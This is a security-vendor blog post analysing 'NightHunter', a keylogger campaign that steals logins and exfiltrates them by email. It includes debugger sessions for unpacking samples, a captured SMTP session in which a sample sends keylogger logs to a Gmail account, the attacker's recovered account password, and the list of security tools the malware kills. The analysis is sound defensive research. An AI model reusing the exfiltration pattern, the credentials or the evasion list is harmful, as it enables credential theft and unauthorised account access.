NightHunter: Malware data theft Campaign has been active since 2009
Cyphort Labs has discovered an extensive data theft campaign that we have named Nighthunter. The campaign has been active since 2009 and is designed to steal login credentials of users. Posted on July 9, 2014 by McEnroe Navaraj
· Campaign is amassing login credentials of users. At this point it does not seem likely that they are targeting specific organization or industries. We have seen threat activity across several verticals including energy, education, insurance and even charities.
· Targeted applications include Google, Yahoo, Facebook, Dropbox and Skype.
· Intent of data collection is unknown but attackers have many options to leverage the credentials and the potential for analyzing and correlating the stolen data to mount highly targeted, damaging attacks is high.
· NightHunter uses SMTP (email) for data exfiltration instead of more common CnC mechanisms that use web protocols. This could be to simply “hide (and steal data) in the plain sight” as organizations beef up web anomaly detection for dealing with advanced attacks.
To learn more about the campaign, join us on our webinar on Thursday, July 31, 2014 9:00 AM PDT http://info.cyphort.com/mmwjuly
It involves several different malware keyloggers, including Predator Pain, Limitless, and Spyrex. The unifying feature is that they all use SMTP (email) for data exfiltration. Email to social networking is like snail-mail is to email, it is outdated and often overlooked, so it can be a more stealthy way of data theft. So we called it NightHunter.
NightHunter is very aggressive at stealing and sending home the users’ passwords. The actors behind NightHunter can use the trove of stolen credentials to leverage big data analytics and enable new cyber threats, for purposes of extortion, credit card or bank fraud, stealing state secrets or corporate espionage.
Our investigation started with a sample delivered through a phishing email. It is a .Net binary and when executed it steals users’ credentials and sends them to a remote email server. It seems like a naive technique to most of the existing “advanced” security products. When we looked into the sample, we found additional “similar” samples. We followed the trail and examined the data it exfiltrated to the remote servers.
The NightHunter data theft campaign is believed to have been active since at least 2009, targeting energy firms, educational institutions, hospitals and charities and other enterprises.
Common Delivery Mechanism :
These samples are delivered mostly through phishing emails. These emails are sent with DOC/ZIP/RAR attachments. You can get infected by opening a malicious document with scripting enabled. Most of the phishing emails are targeted towards personnel in finance/sales/HR departments. Sometimes actors may act as goods resale agents. We have seen cases where it was bundled with fake IDM/7zip installers. Most of these samples used keylogger tools to sniff data from the victim.
Most common Phishing Email subject/attachment names:
1. WireSlip
2. Jobs List
3. PO
4. Reconfirm Pls
5. Purchase Order
6. Payment Slip
7. Order
8. Inquiry
9. Remittance Payment Slip
Types of Stolen Credentials:
1. Google
2. Facebook
3. Dropbox
4. Yahoo
5. Hotmail
6. Amazon
7. Skype
8. LinkedIn
9. Banks
10. Rediff
Victims Industries:
1. Oil industry
2. Charities
3. Educational Institutes
4. Hospitals
5. Departmental Stores
6. Auditors
7. Export/Import Companies.
8. Insurance Companies
9. TV Network
10. Trading Companies
List of keylogger malware used:
1. Limitless logger lite (http://limitlessproducts.org/)
2. Predator Pain
3. Keylogger Logları (SlloTBan)
4. Spyrex
5. FEDERIKO\’s Logger
6. Unknown Logger Public
7. Aux Logger
8. Neptune
9. Mr. Clyde Logger
10. Ultimate Logger
11. MY Ultimate Jobe
12. Syslogger
13. Syndicate Logger (http://syndicateproducts.org)
We are seeing Limitless keylogger many places. Next to the Limitless logger, Predator Pain is popular within the actors. Considering the low cost of the tool, easy setup, quality of virus generator and features it supports, we are seeing increasing interest with the actors. Though Limitless Logger is closed down, it was used heavily.
Most of the keyloggers used provide following features:
– E-Mail/PHP/FTP upload
– Obfuscation
– Spoof Extension and Change Icon
– Clear Browser Data
– Fake Error Message
– Capture Screenshot
– Disable many programs
– Various spreading mechanism
– File Downloader
– Block various websites
– Self-delete
Data Stealing:
– Bitcoin Stealing
– Password managers
– Firefox/Google Chrome/IE/Safari/Opera
– Outlook
– Pidgin/Trillian/Paltalk/AIM/IMVU
– Various Games and Game Bots
– Filezilla/Flashfxp/CoreFTP/SmartFTP/FTP Commander
One of the samples (f997f9bdf00d82a42cb0985c803a0ba1ba0c7faf0b69b0d4a1888f6d1f46d210), even printed out the activity details to the console.
List of Email servers and Number of samples using particular Email server:
|
Email Server |
Sample Count |
First Seen |
Last seen |
|
smtp.googlemail.com/smtp.gmail.com |
2,500 |
2009 |
Today |
|
smtp.mail.ru |
228 |
2010-10-08 |
2014-06-13 |
|
smtp.live.com |
151 |
2010-08-24 |
2014-06-12 |
|
mx1.3owl.com |
82 |
2012-09-10 |
2014-06-05 |
|
smtp.mail.com |
42 |
2011-04-20 |
2014-06-12 |
|
smtp.yandex.com/smtp.yandex.ru |
39 |
2010-12-20 |
2014-06-12 |
|
smtp.turkceventrilo.com |
38 |
2014-04-02 |
2014-06-04 |
|
smtp.mail.yahoo.com |
25 |
2013-02-15 |
2014-06-13 |
|
mail.drmike.com.de |
31 |
2014-04-06 |
2014-05-29 |
|
smtp.aol.com |
13 |
2010-10-27 |
2014-06-06 |
|
smtp.comcast.net |
18 |
2013-05-31 |
2014-06-12 |
|
smtp-mail.outlook.com |
1 |
2014-05-23 |
|
|
smtp.list.ru |
1 |
2014-06-09 |
|
|
smtp.hanco-ltd.biz |
10 |
2014-04-04 |
2014-06-10 |
|
mail.ieindia.org |
7 |
2014-04-29 |
2014-06-10 |
|
mail.npcuae.com |
1 |
2014-06-08 |
|
|
smtp.bilatraders.com |
1 |
2014-06-04 |
|
|
mail.persian-trading.com |
5 |
2014-05-25 |
2014-06-06 |
|
smtp.poczta.onet.pl |
2 |
2012-06-02 |
2014-06-09 |
|
relay.skynet.be |
1 |
2014-06-04 |
|
|
Smtp.interia.pl |
1 |
2014-06-06 |
|
|
mx.freenet.de |
1 |
2014-06-05 |
|
|
cloud73.dotcanada.com |
2 |
2014-04-29 |
2014-05-30 |
|
smtp.bk.ru |
5 |
2014-04-21 |
2014-05-26 |
|
master.torguard.tg |
3 |
2014-05-16 |
2014-05-23 |
|
poczta.o2.pl |
4 |
2014-03-21 |
2014-05-31 |
|
smtp.web.de |
2 |
2011-07-03 |
2014-04-11 |
|
mail.snookiezinc.com.de |
1 |
2014-03-18 |
|
|
mail.atbinco.com |
2 |
2014-05-09 |
|
|
smtps.bol.com.br |
2 |
2014-04-15 |
2014-05-26 |
|
mail.glintcosmetics.com |
2 |
2014-04-25 |
2014-06-11 |
Gmail seems to be the most popular email server used by the criminals to “park” the victim data in recent times. The reason for larger number of samples using Gmail is probably (or likely) due to the popularity of Gmail and because most security products somehow “whitelist” Google/Gmail traffic/activity making it easy to hide this email in the volume of emails sent out to Gmail. Another possible reason is that Gmail imposes a lot of restrictions, such as how many emails a particular account can send on a particular day requiring actors to keep sending new malware with new accounts.
The number of samples the actors sent for other email servers is very low. We believe some of the servers were hacked to create an email account. In some cases actors created their own email server. For example, the email server of The Institution of Engineers (ieindia.org) was hacked to create two accounts and used to park the victim data mostly from India. Some of these samples that used private email servers were active for only a few weeks.
Most of the virus generator tools provide various options to exfiltrate data from the victim machine, such as like Email, FTP and PHP upload. Looking at the patterns most of these actors started with PHP upload and then moved to Email. Analysis of recent malware samples reveals that most of the actors started to use only Email. Very few malware samples used multiple methods to exfiltrate the data like FTP and Email.
mx1.3owl.com
|
First Seen Date |
Infection Count |
Keylogger |
|
6/5/2014 |
2 |
Predator Pain |
|
6/4/2014 |
31 |
Predator Pain |
|
6/4/2014 |
47 |
Predator Pain |
|
6/3/2014 |
10 |
Predator Pain |
|
6/3/2014 |
15 |
Predator Pain |
|
6/3/2014 |
33 |
Predator Pain |
|
6/2/2014 |
2 |
Predator Pain |
|
6/2/2014 |
50 |
Predator Pain |
|
6/2/2014 |
2 |
Predator Pain |
|
6/1/2014 |
33 |
Predator Pain |
|
5/30/2014 |
7 |
Predator Pain |
|
5/25/2014 |
44 |
Predator Pain |
|
5/20/2014 |
6 |
Predator Pain |
|
5/17/2014 |
5 |
Mr. Clyde Logger and Predator |
|
5/15/2014 |
26 |
|
|
5/12/2014 |
5 |
Mr. Clyde Logger and Predator |
|
5/11/2014 |
39 |
Predator Pain |
|
5/8/2014 |
59 |
Predator Pain |
|
5/7/2014 |
||
|
5/6/2014 |
6 |
Predator Pain |
|
5/2/2014 |
20 |
Predator Pain, Limitless Logger |
|
4/24/2014 |
37 |
Predator Pain |
|
4/23/2014 |
57 |
Predator Pain, Limitless Logger |
|
4/22/2014 |
57 57 |
Predator Pain, Limitless Logger Predator Pain, Limitless Logger, MY Ultimate Jobe |
|
4/17/2014 |
57 57 14 |
Predator Pain, Limitless Logger Predator Pain, Limitless Logger, MY Ultimate Jobe Predator Pain |
|
4/16/2014 |
||
|
4/15/2014 |
1 |
Predator Pain |
|
4/10/2014 |
73 |
Predator Pain, Limitless Logger |
|
4/9/2014 |
73 |
Predator Pain, Limitless Logger Limitless Logger |
|
4/5/2014 |
57 |
Predator Pain, Limitless Logger Limitless Logger Predator Pain, Limitless Logger |
|
4/3/2014 |
42 |
|
|
3/27/2014 |
73 |
|
|
2/18/2014 |
1 |
Predator Pain |
|
1/28/2014 |
57 |
Predator Pain, Limitless Logger, MY Ultimate Jobe |
Actors behind these malware samples (35 out of 82) followed similar techniques while registering domains. Author’s identity is hidden to the analyst.
List of Samples we looked into and related to mx1.3owl.com
62F3DF70D746C898A3A5ACAD1EB6117F
5DAB1479F63376739DFE0F8140F3263E
0C25431D2B13C99AFC0DE7338E9A3ACE
BDC5A619BC2D96616D900DFEBC2D21E7
845EFE43B05A7334B0AE8CB39C6AA4E5
3164A660B54EBE994B467D765465D23C
09423D5E22289F0F8E31FE4FC2DA0A25
416CE138B5F02F00253FC08989A9CD12
DE59FB78752DE040010EDA63667C26CA
CEC37293C2ADF3C9EECA7EE14979BDAD
26D13E5412D282DA91E4053D92B34271
3CE8C9743D9F523009CA84CD3B12B1B8
71AC33835389B800FE5BDB69786A62B8
3831B1FCE2B1CDC662262D389529A298
8117AAA51EE22F13E817F67E7A816F48
28F718CCE2D22F61108B580746CFD810
736A752D2B0B96741213404177DBD8F6
DEFB1E6E42EDC46FA9630CDF42C347F9
5EFF0A000B0B63D67BD3F9BBFB8991D0
207A9A92C697E83B21FC44E4DF0247AD
7D9F321A673266B4BDE3F48CE132A81E
D0D13CDAB7EE6DC22A52FBB0A2FA5F16
31D0DD3ADBE378F8BF3D13FC0BF69D51
C475E64740710B398F458710E7CBF3FD
F4E7CC408B9902A92181BF46282C46DD
0AA6E7204A3DBA4EBE6F81331FF9EF3B
9716665CB4F603C4D1CA96D7CC7A555C
0E4FA8AB9CF7C64714C436735D68E1F0
B699A3FE2B531139FAB267689B3CEF14
B7103ED3D263578FA26E06C9E6ADBD21
A514FCBDF47C0829843A1C03D1061F28
9350F7B4513198F86987F36A8D400D34
AD9A3311486DF3B7B457779EA486BC5D
9A285873E25F43085D9DE5FCA4D898D5
77CF51DA449598A43CF030A7EC9F223E
4BD63A33567A9EAF80D0E0730DE6AB0A
D1683408FEFA12BB93FC15CE2DEDD7C7
7AD0EABC5B9D6F6B1A7BE35B75F68681
mail.ieindia.org:
All the samples related to this email server were active for only a few weeks. This was targeted towards people from India. Actors used Limitless logger to extract the information from the victims. Analysts believe that actors hacked into their email server and created two email accounts to park their data. Victims were from different industries.
| 70b0e2fb1e54d16f96d11685c81071361afb66523c3c81b054344c21df1bd6ec | 2014-06-10 |
| db3b52afd523055cabcc0df3c9f0eeced65e627fd2f7e2b9d4d8e0f5c6141f42 | 2014-06-03 |
| 8dfdd1f019c2b4c3d4bc9fb6a8e15b7a4cca916a5540c7dae65f83c4ec60b2e7 | 2014-06-02 |
| 9a71df6f73875488754583f53e6caf9c654526fc55c09c4d4b57003788b844c4 | 2014-05-09 |
| aea5e5650fb857b1675fe68eb7f102e7695322a70defce79f59a72f3f34ea6c4 | 2014-05-29 |
| 75b4e7f2917dd18ce7d2d4a9238b5b8072b997ff2634444d0a43b69acc1f14ea | 2014-05-28 |
| 584e6f7326ee93f1f03cca1014263bcef007fcfa6d527a77cb040b20e165bb4a | 2014-04-29 |
Manual Analysis
Most of the samples we manually analyzed included a lot of obfuscation techniques used to delay the analysis. We will be looking at static analysis details of this sample (MD5: cfb72c025bc99733a7f0c21242738a57) and other related samples.
Anti-analysis techniques used:
1. Use non-printable characters as a class/variable names in the code.
2. Use Assmbly.Load() function to load a different assembly.
3. Strings in the code are encoded using various methods. (We found almost 10 different methods.)
4. Various product detection code.
5. Debugger detection code.
We looked into the binary using various .Net disassemblers. Most of the disassemblers didn’t work for most of the binaries. Using ILSpy we analyzed this binary. Internally it decoded another assembly from its resource section and loaded it.
We decided to dump the second stage using the WinDBG. Most of the first stage binary did not use a debugger detection or security product detection code, but the second stage does.
0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> g
0:000> .loadby sos mscorwks
0:000> !bpmd mscorlib.dll System.AppDomain.Load
0:000> g
0:000> !clrstack -a
OS Thread Id: 0xc64 (0)
ESP EIP
0045ed38 67f0736c System.AppDomain.Load(Byte[])
PARAMETERS:
this = 0x02851268
rawAssembly = 0x02879c04
LOCALS:
<no data>
0045ed3c 00341c55 jhgfdertyui.iuytrdfghj.Form1_Load(System.Object, System.EventArgs)
PARAMETERS:
this = <no data>
sender = <no data>
e = <no data>
LOCALS:
<no data>
0x0045ed3c = 0x02879c04
0:000> !da 0x02879c04
Name: System.Byte[]
MethodTable: 67ac37b8
EEClass: 6787eb8c
Size: 32268(0x7e0c) bytes
Array: Rank 1, Number of elements 32256, Type Byte
Element Methodtable: 67ac3868
[0] 02879c0c
…
[32255] 02881a0b
0:000> .writemem c:\tmp\secondstage.bin 02879c0c L0n32255
Writing 7dff bytes…………….
The second stage binary was again obfuscated. It used a lot of variables with nonprintable characters. Since we were not able to set breakpoints in the windbg, we decided to do dynamic analysis on the binary. This binary tried to persist in the system using autorun registry modification. It first tried to connect to a remote server (depends on the binary) to find the external IP address and send an Email to remote server.
It connected to a remote email server (mx1.3owl.com) and sent an email with victim information. It used Predator Pain v14 keylogger. We extracted the email credentials from the network traffic.
Let’s look into other similar binaries that included credentials in plain text in the original sample itself.
MD5: 3d7fee36dcd7f1e6bed77d6d9648ada5d899d3efc8dc1d1fd605f75c065cf84d
Email credentials were hidden at the end of file.
Some binaries looked for a few security products installed in the machine. If they found any security products, they hid their own window and killed the security product.
All this detection looks for particular process name.
AntiKeyscrambler() -> keyscrambler
AntiWireshark() -> wireshark
AntiAnubis() -> anubis
AntiMalwarebytes() -> mbam
AntiKaspersky() -> avp
AntiOllydbg() -> ollydbg
AntiOutpost() -> outpost
AntiNorman() -> npfmsg
AntiBitDefender() -> bdagent
AntiNOD32() -> egui
We used windbg to dump the credentials for some of the samples that did not do debugger detection.
0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> sxe ld:System.Windows.Forms.dll
0:000> g
ModLoad: 00000000`6f680000 00000000`6fb4e000 System.Windows.Forms.dll
ntdll!ZwMapViewOfSection+0xa:
00000000`77a6153a c3 ret
0:000> .loadby sos mscorwks
0:000> .symfix
0:000> ld system_ni
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
Found 4 methods…
Setting breakpoint: bp 000007FEEA84F490 [System.Net.NetworkCredential..ctor()]
Setting breakpoint: bp 000007FEEA3D6B10 [System.Net.NetworkCredential..ctor(System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4A0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4C0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String, Boolean)]
0:000> g
Breakpoint 1 hit
System_ni+0x236b10:
000007fe`ea3d6b10 53 push rbx
0:000> !dumpobj -nofields rdx
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 66(0x42) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: alinsterpu@gmail.com
0:000> !dumpobj -nofields r8
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 46(0x2e) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: hainerosii
Most of the binaries used TCP/587 to send emails to the remote server. Some binaries associated with mx1.3owl.com used TCP/2525 to send emails. We retrieved most of the credentials using dynamic analysis including Gmail. Gmail used encrypted channel to communicate to the remote server. Since the number of samples that used Gmail was high, we decided to MITM the Gmail traffic in our malware lab.
S->C 53 b’220 mx.google.com ESMTP ec2sm20231912pbc.63 – gsmtp\r\n’
C->S 16 b’EHLO test-PC\r\n’
S->C 137 b’250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-STARTTLS\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n’
C->S 10 b’STARTTLS\r\n’
S->C 30 b’220 2.0.0 Ready to start TLS\r\n’
Wrapping sockets.
C->S 16 b’EHLO test-PC\r\n’
S->C 178 b’250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n’
C->S 41 b’AUTH login YWxpbnN0ZXJwdUBnbWFpbC5jb20=\r\n’
S->C 18 b’334 UGFzc3dvcmQ6\r\n’
C->S 18 b’aGFpbmVyb3NpaQ==\r\n’
S->C 20 b’235 2.7.0 Accepted\r\n’
C->S 34 b’MAIL FROM:<alinsterpu@gmail.com>\r\n’
S->C 42 b’250 2.1.0 OK ec2sm20231912pbc.63 – gsmtp\r\n’
C->S 32 b’RCPT TO:<alinsterpu@gmail.com>\r\n’
S->C 42 b’250 2.1.5 OK ec2sm20231912pbc.63 – gsmtp\r\n’
C->S 6 b’DATA\r\n’
S->C 43 b’354 Go ahead ec2sm20231912pbc.63 – gsmtp\r\n’
C->S 228 b’MIME-Version: 1.0\r\nFrom: alinsterpu@gmail.com\r\nTo: alinsterpu@gmail.com\r\nDate: 17 Jun 2014 01:25:48 +0530\r\nSubject: New keylogger logs!\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n’
C->S 48 b’keylogger started at: 6/17/2014 1:24:43 AM=0D=0A’
One of the sample we analyzed (MD5: 8962ca1997193be3931c41983cc4600e941d40bdb0fdddafa00f3761feeb4ba8) used both Email and FTP to exfiltrate data from the users machine.
Most of the samples used code level obfuscation to delay the analysis. In the end, we got 10 different methods (decoding/decryption) to decode various strings. No wonder these samples were created using similar virus generator tools.
NightHunter is one the more unique campaigns we have researched at Cyphort due to the footprint and complex data collection models it exhibits, furthermore the use of low-signal evasion it is leveraging such as webmail for data exfiltration points to much larger end-goal. This points to the shifting “Tradecraft” being adopted by actors leveraging BigData models to mine more interesting and strategically suitable data, whether it being for direct and targeted attacks or providing highly actionable content to other actors for economic benefits. Source